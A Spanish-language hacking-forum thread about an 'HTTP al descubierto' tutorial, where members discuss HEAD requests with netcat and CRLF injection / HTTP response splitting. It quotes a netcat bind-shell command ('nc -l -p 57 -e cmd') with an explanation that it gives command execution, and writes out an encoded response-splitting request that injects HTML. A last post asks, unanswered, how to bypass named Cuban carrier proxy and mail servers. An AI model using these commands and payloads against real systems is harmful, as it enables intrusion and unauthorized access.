Junio 22, 2018, 05:17:17 am

Autor Tema: HTTP al descubierto  (Leído 23015 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado seth

  • El mas real
  • Moderador
  • *****
  • Mensajes: 7936
  • Sexo: Masculino
    • Ver Perfil
HTTP al descubierto
« en: Noviembre 22, 2010, 05:17:41 pm »
Pensé que esto estaba posteado, se habrá perdido cuando volvimos seis meses para atras



You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
« Última modificación: Enero 08, 2012, 07:02:50 pm por The X-C3LL »


Ves links a xd-blog.com.ar que no andan? buscalos en You are not allowed to view links. Register or Login

Desconectado Y.G.E.

  • Me das tu IP?
  • *
  • Mensajes: 6
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #1 en: Julio 11, 2011, 06:19:22 pm »
No funcionana los 3 link Funciona el ultimo nomas  :-\

Desconectado seth

  • El mas real
  • Moderador
  • *****
  • Mensajes: 7936
  • Sexo: Masculino
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #2 en: Julio 12, 2011, 07:10:51 am »
el de mi web anda

Desconectado elias52

  • Me das tu IP?
  • *
  • Mensajes: 14
  • Sexo: Masculino
  • Boom Boom!
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #3 en: ſeptiembre 07, 2011, 10:59:45 am »
una pregunta,si tengo windows como hago para hacer eso de head que aparece en el tutorial? porque abro la consola cmd y pongo head You are not allowed to view links. Register or Login y me salta que head no se reconoce como un comando interno o externo.
Amo este mundo de unos y ceros.

Desconectado The X-C3LL

  • Troll Profesional
  • Moderador Global
  • *****
  • Mensajes: 2462
  • Sexo: Masculino
  • Bitches, I have my powers again!
    • Ver Perfil
    • 0V3RL04D 1N TH3 N3T
Re:HTTP al descubierto
« Respuesta #4 en: ſeptiembre 07, 2011, 11:53:20 am »

No es un comando por defecto en windows, pero no hay ningún problema. Utiliza netcat para realizar la conexión y manda la petición con la cabecera HEAD (en ese mismo artículo aparece como hacer esto, no te preocupes). Si quieres hacer "HEAD" como un comando, la forma más simple (sin utilizar ningún lenguaje de programación) es hacer un .bat que lance la petición desde netcat. Si tienes dudas sobre esto puedes preguntar en la sección de batch que tenemos en el foro.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login - You are not allowed to view links. Register or Login

Desconectado elias52

  • Me das tu IP?
  • *
  • Mensajes: 14
  • Sexo: Masculino
  • Boom Boom!
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #5 en: ſeptiembre 07, 2011, 12:36:28 pm »
una pregunta,si tengo windows como hago para hacer eso de head que aparece en el tutorial? porque abro la consola cmd y pongo head You are not allowed to view links. Register or Login y me salta que head no se reconoce como un comando interno o externo.

No es un comando por defecto en windows, pero no hay ningún problema. Utiliza netcat para realizar la conexión y manda la petición con la cabecera HEAD (en ese mismo artículo aparece como hacer esto, no te preocupes). Si quieres hacer "HEAD" como un comando, la forma más simple (sin utilizar ningún lenguaje de programación) es hacer un .bat que lance la petición desde netcat. Si tienes dudas sobre esto puedes preguntar en la sección de batch que tenemos en el foro.
[/quote]

gracias por la respuesta :) cualquier duda les aviso :D

Desconectado DarkProgrammer

  • Yo vivo en CPH
  • ***
  • Mensajes: 716
  • Sexo: Masculino
  • Gracias 5475UK1 por las fotos.
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #6 en: Enero 04, 2012, 06:29:03 pm »
Grande , me lo estoy leyendo. Grosooo
Cuando te das cuanta como deberias haber hecho las cosas, es cuando realmente mejoras.

El tiempo es un buen maestro, solo que lamentablemente, asesina a todos sus discípulos. Curt Goetz

Tres clases hay de ignorancia:no saber lo que debiera saberse, saber mal lo que se sabe, y saber lo que no debiera saberse.(Rochefoucauld)
You are not allowed to view links. Register or Login

Desconectado ElGatoMorales

  • CPQUE??
  • *
  • Mensajes: 1
  • Sexo: Masculino
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #7 en: Julio 30, 2012, 10:15:32 pm »
yeeah amigo! gracias por la info... checare los links detalladamente! :D

Desconectado xaps

  • Me das tu IP?
  • *
  • Mensajes: 34
  • ¿Has probado a reiniciar?
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #8 en: Octubre 30, 2013, 04:03:07 pm »
Leyendo el capítulo "/.0x03 CR/LF Injections (introducción al HTTP Splitting)" me han surgido varias dudas:
 - La inyección del código malicioso se hace mediante URL, tal como se hace en SQLi? (Por lo que la URL quedaria "You are not allowed to view links. Register or Login –l –p 57 –e cmd")

 - En el caso que la respuesta a la pregunta anterior sea que si, cuando haces este tipo de inyección, el archivo (en este caso, troyano.bat) lo estás alojando en el servidor en el que está la web alojada, o en el PC de la persona a la que le envíes la URL?
Mi intuición me dice que en el PC de la persona a la que le envías la URL, pero entonces no consigo entender que es lo que se está haciendo realmente al modificar la URL. Por lo que veo, al modificar el parámetro file de la URL, también modificas el de la cabecera. Pero esto hará que el archivo que se baje la persona a la que le mandas la URL esté modificado con nuestro código? Y en ese caso, el código es substituido, sobrescrito, o añadido al final del código original?

 - No entiendo que hace el comando "nc -l -p 57 -e cmd". Se que nc -l 57 lo que hace es dejar el puerto 57 a la escucha, pero los parámetros -p y -e no se que funcionalidad tienen.

Espero haber hecho estas preguntas en el lugar adecuado.

Saludos y gracias.

Desconectado The X-C3LL

  • Troll Profesional
  • Moderador Global
  • *****
  • Mensajes: 2462
  • Sexo: Masculino
  • Bitches, I have my powers again!
    • Ver Perfil
    • 0V3RL04D 1N TH3 N3T
Re:HTTP al descubierto
« Respuesta #9 en: Octubre 30, 2013, 10:38:57 pm »
Saludos

  La inyección CRLF la haces en el parámetro que sea vulnerable, puede ser POST, GET, o incluso una cookie o un user-agent, es independiente y depende de donde se halle la vulnerabilidad. La opción -p indica puerto y la -e indica la ejecución de un programa, en este caso el cmd que es la consola de windows que nos permitiría ejecutar comandos en el ordenador afectado.

Desconectado xaps

  • Me das tu IP?
  • *
  • Mensajes: 34
  • ¿Has probado a reiniciar?
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #10 en: Octubre 31, 2013, 05:10:29 am »

Tendré que leer más sobre CRLF, ya que no logro entender que y como se explota esta vulnerabilidad.

Gracias.

Desconectado The X-C3LL

  • Troll Profesional
  • Moderador Global
  • *****
  • Mensajes: 2462
  • Sexo: Masculino
  • Bitches, I have my powers again!
    • Ver Perfil
    • 0V3RL04D 1N TH3 N3T
Re:HTTP al descubierto
« Respuesta #11 en: Noviembre 02, 2013, 11:00:58 pm »
Saludos

  La inyección CRLF la haces en el parámetro que sea vulnerable, puede ser POST, GET, o incluso una cookie o un user-agent, es independiente y depende de donde se halle la vulnerabilidad. La opción -p indica puerto y la -e indica la ejecución de un programa, en este caso el cmd que es la consola de windows que nos permitiría ejecutar comandos en el ordenador afectado.

Tendré que leer más sobre CRLF, ya que no logro entender que y como se explota esta vulnerabilidad.

Gracias.
[/quote]

Una vez comprendas el protocolo HTTP, es muy simple. Te recomendaría que te enfocases a su estudio :)

Desconectado xaps

  • Me das tu IP?
  • *
  • Mensajes: 34
  • ¿Has probado a reiniciar?
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #12 en: Noviembre 03, 2013, 10:45:27 am »

Me he estado mirando la entrada en Wikipedia sobre el protocolo HTTP, y tengo las cosas un poco más claras.
Supongamos una web vulnerable con el siguiente codigo inyectado*:
You are not allowed to view links. Register or Login

La petición al servidor sería la siguiente:
Código: You are not allowed to view links. Register or Login
GET/redir.php?url=%0d%0aContent-Type:%20text/html
%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:
%20text/html%0d%0a%0d%0a%3Ccenter%3E
%3Ch1%3EHacked%3C/h1%3E%3C/center%3E
HTTP/1.1[CRLF]
Host: www.web.com[CRLF]
Mozilla/5.0 (Windows NT 6.0; rv:17.0) Gecko/17.0 Firefox/17.0[CRLF]
Accept:text/html,application/xhtml+xml,application/xml;q
=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-
8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]

Que si substituimos los códigos hexadecimales, obtenemos lo siguiente:
Código: You are not allowed to view links. Register or Login
GET/redir.php?url=

Content-Type: text/html
HTTP/1.1 200 OK
Content-Type: text/html
<center><h1>Hacked</h1></center>

HTTP/1.1[CRLF]
Host: www.web.com[CRLF]
Mozilla/5.0 (Windows NT 6.0; rv:17.0) Gecko/17.0 Firefox/17.0[CRLF]
Accept:text/html,application/xhtml+xml,application/xml;q
=0.9,*/*;q=0.8[CRLF]
Accept-Language: en-us,en;q=0.5[CRLF]
Accept-Encoding: gzip, deflate[CRLF]
Accept-Charset: ISO-8859-1,utf-
8;q=0.7,*;q=0.7[CRLF]
Connection: keep-alive[CRLF][CRLF]

Y como respuesta obtendríamos:
Código: You are not allowed to view links. Register or Login
HTTP/1.1 302 Found[CRLF]
Date: Sat,3,Nov,2012 10:32:46 GMT[CRLF]
Server: Apache/1.3.33 (Win32) PHP/5.0.2[CRLF]
X-Powered-By: PHP/5.0.2[CRLF]
Location:[CRLF]
Content-Type: text/html[CRLF][CRLF]
HTTP/1.1 200 OK [CRLF]
Content-Type: text/html[CRLF][CRLF]
<center><h1>Hacker</h1></center>[CRLF]
Keep-Alive: timeout=15, max=100[CRLF]
Connection: Keep-Alive[CRLF]
Transfer-Encoding: chunked[CRLF]
Content-Type: text/html[CRLF][CRLF]

Donde el código inyectado seria el que va desde la línea 7 hasta la 9, provocando que la respuesta se divida y obteniendo una segunda respuesta válida a partir de la línea 7. Es correcto?

*Ejemplo obtenido de You are not allowed to view links. Register or Login

Desconectado seth

  • El mas real
  • Moderador
  • *****
  • Mensajes: 7936
  • Sexo: Masculino
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #13 en: Noviembre 03, 2013, 05:27:04 pm »
No estoy seguro de que funcione mandar dos veces todo.
Podes levantar una web vulnerable en localhost y probarlo

Desconectado yusbelpiki

  • CPQUE??
  • *
  • Mensajes: 1
    • Ver Perfil
Re:HTTP al descubierto
« Respuesta #14 en: Diciembre 13, 2016, 08:47:06 pm »
¿Necesito saber la forma de vulnerar estos servidores para lograr conectarme a internet?
En Cuba solamente se puede acceder a dos web mediante los datos mobiles, (mms.cubacel.cu con el proxy 200.13.145.52:8080, consultar los mms y webmail.nauta.cu o webmail.nauta.co.cu IP 181.225.231.19, consultar los correos nauta. A estos dos servidores se pueden acceder tambien mediante la internet. He utilizado todo tipo de VPN y ninguna funciona algunas de estas VPN solo logran enviar bytes pero no recibirlos, en fin no logro crear un tunel para conectarme. Si alguien supiera como saltarse el proxy del server mms o utilizar el server del correo nauta para conectarme pliss, les agradeceria su colaboracion.


exclamation
HTTP al descubierto by LIx & The X-C3LL

Iniciado por Sknight

5 Respuestas
1850 Vistas
Último mensaje Marzo 18, 2009, 03:29:25 pm
por c4x30x
question
ver web cam sin ser descubierto

Iniciado por zeus013

4 Respuestas
1917 Vistas
Último mensaje Julio 29, 2012, 03:14:21 pm
por OnTheCore
xx
Falsificadores al Descubierto.

Iniciado por JaAViEr

0 Respuestas
1024 Vistas
Último mensaje Marzo 07, 2009, 08:37:13 pm
por JaAViEr
xx
Cookies al descubierto

Iniciado por The X-C3LL

15 Respuestas
7257 Vistas
Último mensaje Junio 10, 2013, 05:32:02 pm
por seth
xx
carpeta wp-admin al descubierto.

Iniciado por ruben_linux

4 Respuestas
1229 Vistas
Último mensaje Noviembre 21, 2011, 08:17:38 pm
por seth
xx
Speed Touch 585 v6 al descubierto.

Iniciado por lampi

0 Respuestas
4911 Vistas
Último mensaje Febrero 14, 2007, 08:56:26 am
por lampi
exclamation
Los códigos secretos de Android al descubierto

Iniciado por Stuxnet

0 Respuestas
1100 Vistas
Último mensaje Agosto 05, 2012, 06:34:28 pm
por Stuxnet
xx
WPA,gracias a WPS casi al descubierto sin diccionario.

Iniciado por ps3ps3ps3

54 Respuestas
62276 Vistas
Último mensaje Agosto 20, 2016, 08:41:53 pm
por Cid.dimitrius
question
Entrar en otro equipo de mi lan sin ser descubierto

Iniciado por shurfin

3 Respuestas
3133 Vistas
Último mensaje Octubre 31, 2009, 04:40:34 am
por shurfin
exclamation
Wifi-Link 1 Watt USB al descubierto!

Iniciado por SEKTOR

2 Respuestas
1728 Vistas
Último mensaje Agosto 22, 2010, 12:45:49 pm
por 5475UK1